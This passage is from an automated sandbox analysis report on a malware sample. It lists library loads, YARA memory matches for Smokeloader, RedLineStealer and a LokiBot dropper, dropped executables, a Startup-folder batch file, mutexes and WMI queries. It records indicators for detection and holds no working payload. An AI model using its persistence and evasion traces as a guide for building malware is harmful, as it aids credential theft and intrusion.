                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: samcli.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: samlib.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: wtsapi32.dll
                  Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000005.00000002.4581208018.000000000A499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000005.00000002.4581208018.000000000A6D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000024.00000002.3385094968.0000000001171000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000001E.00000002.3216770112.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000021.00000002.3266926233.000000000111E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000020.00000002.3381975417.0000000000FDD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000001E.00000002.3187121792.0000000001021000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000020.00000002.3398211956.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000024.00000002.3409633902.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000021.00000002.3298037878.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000019.00000002.3250452098.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: BroomSetup.exe.13.drStatic PE information: Section: UPX1 ZLIB complexity 0.9906817205315225
                  Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@115/137@16/100
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00405C44 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,GetDiskFreeSpaceA,MulDiv,13_2_00405C44
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00414DE0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,15_2_00414DE0
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00402988 CoCreateInstance,MultiByteToWideChar,13_2_00402988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\xBWhJ9fAo9Iu3r2QPWYsNC0n.exe
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeMutant created: \Sessions\1\BaseNamedObjects\Global\signature_netsetup
                  Source: C:\Windows\SysWOW64\rundll32.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:44256:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:19828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:25656:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\signature_netcheck
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9660:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3876
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znt5400f.utx.ps1
                  Source: Yara matchFile source: 46.2.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002E.00000002.4470759393.0000000000401000.00000040.00000001.01000000.0000002B.sdmp, type: MEMORY
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
                  Source: dl7WL77rkA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: dl7WL77rkA.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C048000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT OSArchitecture FROM Win32_OperatingSystem.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCDriverData=C:\Windows\System32\Drivers\DriverData
